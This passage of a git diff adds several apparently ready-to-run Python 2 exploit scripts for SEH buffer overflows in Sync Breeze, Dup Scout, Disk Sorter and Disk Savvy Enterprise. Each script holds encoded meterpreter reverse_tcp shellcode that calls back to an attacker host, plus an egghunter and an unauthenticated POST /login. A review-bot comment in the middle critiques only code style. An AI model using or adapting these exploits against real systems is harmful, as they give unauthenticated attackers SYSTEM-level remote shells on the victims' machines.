+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 100159be
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\xbe\x59\x01\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+
diff --git a/platforms/windows/remote/40456.py b/platforms/windows/remote/40456.py
new file mode 100755
index 000000000..0b7430373
--- /dev/null
+++ b/platforms/windows/remote/40456.py
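Review bot: `import sys` is never used, and `connect=s.connect(('192.168.123.132',80))` binds the `None` that `socket.connect` returns to a name that is never read; the import should be dropped and the line reduced to `s.connect(('192.168.123.132',80))`. The file also depends on Python 2 (`print "..."` statements, `str` byte literals) but its header comments never say so, while the `#!/usr/bin/python` shebang gives no hint either; the header block that already lists "Tested on" should state the interpreter requirement. The target address is duplicated between the `connect` call and the `Host:` header with no single variable, so the "Swop out IP" comment requires two edits that are easy to leave inconsistent. 40456.py is a line-for-line copy of this file apart from the title, `#pop pop ret` address and `seh` value, and has the same three issues.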
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Greetings to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10030991
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x91\x09\x03\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+
diff --git a/platforms/windows/remote/40457.py b/platforms/windows/remote/40457.py
new file mode 100755
index 000000000..6c25eb807
--- /dev/null
+++ b/platforms/windows/remote/40457.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 1006cd33
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x33\xcd\x06\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+
diff --git a/platforms/windows/remote/40458.py b/platforms/windows/remote/40458.py
new file mode 100755
index 000000000..8235ece09
--- /dev/null
+++ b/platforms/windows/remote/40458.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Disk Sorter Enterprise 9.0.24 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10048d36
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x36\x8d\x04\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+
diff --git a/platforms/windows/remote/40459.py b/platforms/windows/remote/40459.py
new file mode 100755
index 000000000..8a4b67c06
--- /dev/null
+++ b/platforms/windows/remote/40459.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Disk Savvy Enterprise 9.0.32 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10076451
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x51\x64\x07\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+